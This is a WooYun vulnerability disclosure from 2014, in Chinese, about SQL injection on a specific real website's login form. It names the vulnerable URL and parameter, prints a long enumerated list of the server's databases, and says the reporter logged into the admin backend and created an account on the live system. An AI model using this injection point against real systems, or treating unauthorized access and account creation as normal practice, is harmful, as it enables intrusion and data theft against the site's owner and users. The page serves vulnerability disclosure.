当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048335

漏洞标题:易观国际某站sql注射可泄漏大量信息

相关厂商:易观网

漏洞作者: se55i0n

提交时间:2014-01-10 11:33

修复时间:2014-02-24 11:34

公开时间:2014-02-24 11:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-10: 细节已通知厂商并且等待厂商处理中
2014-01-13: 厂商已经确认,细节仅向厂商公开
2014-01-23: 细节向核心白帽子及相关领域专家公开
2014-02-02: 细节向普通白帽子公开
2014-02-12: 细节向实习白帽子公开
2014-02-24: 细节向公众公开

简要描述:

也不知道167个数据库算不算大量信息~

详细说明:

问题站点:易观国际的产品服务门户网站

http://www.enfodesk.com


测试SQL注射点如下,存在注入的参数user_name:

http://www.enfodesk.com/SMinisite/newinfo/muserlogin/nand_id/1
act=login2&r_url=&user_name=a&user_pass=a


167个数据库:

available databases [157]:
[*] analysys
[*] analysys_survey
[*] bbs_home
[*] book
[*] club
[*] e
[*] ecdc_admin
[*] ecdc_data
[*] ecdc_user
[*] edm
[*] egc_admin
[*] egc_data
[*] egc_function
[*] egc_info
[*] egc_log
[*] egc_survey
[*] egc_user
[*] ek_admin
[*] ek_chart_data
[*] ek_data
[*] ek_data_icafe
[*] ek_data_nwbench
[*] ek_forum
[*] ek_function
[*] ek_index
[*] ek_info
[*] ek_info_2007
[*] ek_info_2008
[*] ek_info_2009
[*] ek_info_2010
[*] ek_info_2011
[*] ek_info_2012
[*] ek_info_2013
[*] ek_info_2014
[*] ek_info_2015
[*] ek_log
[*] ek_minisite
[*] ek_news_collection
[*] ek_test
[*] ek_user
[*] ek_vendor
[*] enfocapital
[*] enfodesk
[*] enfodesk_data
[*] enfodesk_database
[*] enfodesk_edm
[*] enfodesk_info
[*] enfodesk_members
[*] enfodesk_minisite
[*] enfodesk_product
[*] enfodesk_user
[*] enfogrowth
[*] enfonet
[*] gamesurvey2010
[*] getinfo_vest
[*] global_admin
[*] global_business_map
[*] global_config
[*] global_data
[*] global_info
[*] global_information
[*] global_list
[*] global_search
[*] global_vendor
[*] information_schema
[*] lime
[*] member
[*] minisite_product
[*] mobile_market_info
[*] mobile_market_info_v2
[*] mobile_market_info_v2_2013_09
[*] mobile_market_info_v2_2013_10
[*] mobile_market_rank
[*] mobile_market_rank_bak
[*] mt_admin
[*] mt_config
[*] mt_function
[*] mt_global
[*] mt_info
[*] mt_info_2007
[*] mt_info_2008
[*] mt_info_2009
[*] mt_info_2010
[*] mt_info_2011
[*] mt_info_2012
[*] mt_info_2013
[*] mt_info_2014
[*] mt_info_2015
[*] mt_log
[*] mt_member
[*] mt_survey
[*] mt_user
[*] mt_vendor
[*] mt_web_info
[*] mysql
[*] ntmodel
[*] oa_analyst
[*] partners_admin
[*] pic
[*] product
[*] product_ek_info_2007
[*] product_ek_info_2008
[*] product_ek_info_2009
[*] product_ek_info_2010
[*] product_ek_info_2011
[*] product_ek_info_2012
[*] product_global_admin
[*] product_global_information
[*] product_global_list
[*] product_mt_info_2007
[*] product_mt_info_2008
[*] product_mt_info_2009
[*] product_mt_info_2010
[*] product_mt_info_2011
[*] product_mt_info_2012
[*] questionnaire_info
[*] search_tmp
[*] shequ
[*] spider_news
[*] stock
[*] taobao_data
[*] taobao_data_model
[*] taobao_data_model_bak
[*] user
[*] utf8_ek_admin
[*] utf8_ek_chart_data
[*] utf8_ek_data
[*] utf8_ek_data_icafe
[*] utf8_ek_edm
[*] utf8_ek_forum
[*] utf8_ek_function
[*] utf8_ek_index
[*] utf8_ek_info
[*] utf8_ek_info_2007
[*] utf8_ek_info_2008
[*] utf8_ek_info_2009
[*] utf8_ek_info_2010
[*] utf8_ek_info_2011
[*] utf8_ek_info_2012
[*] utf8_ek_log
[*] utf8_ek_minisite
[*] utf8_ek_user
[*] utf8_ek_vendor
[*] utf8_gamesurvey2010
[*] utf8_global_info
[*] utf8_global_information
[*] utf8_global_list
[*] utf8_global_vendor
[*] utf8_mobile_market_info
[*] utf8_mobile_market_info_v2
[*] utf8_mobile_market_rank
[*] utf8_search_tmp
[*] utf8_taobao_data
[*] utf8_taobao_data_model
[*] vote
[*] wiki
[*] wordpress


进入管理后台,超级管理员;

1.png


3.png


新建了一个账户,请自行删除~

4.png


后台同样存在SQL注射漏洞;

5.png


漏洞证明:

3.png


4.png


5.png


修复方案:

过滤

版权声明:转载请注明来源 se55i0n@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-01-13 08:54

厂商回复:

我们会尽快修复感谢您对我们工作的支持

最新状态:

暂无


漏洞评价:

评论

  1. 2014-01-10 11:37 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @xsser ×,小厂商流程~

  2. 2014-01-10 11:46 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @se55i0n - -

  3. 2014-01-10 11:57 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @xsser 这个厂商是小厂商吧~内容还是殷实

  4. 2014-01-10 12:00 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @se55i0n 内容不错~

  5. 2014-04-27 16:15 | 橘子 ( 路人 | Rank:0 漏洞数:3 | 呢个...羞射高中生一枚。带上大神@Haswell...)

    @se55i0n 大大请教一下-.- 肿么确定注入点?软件还是自己手动什么的=///=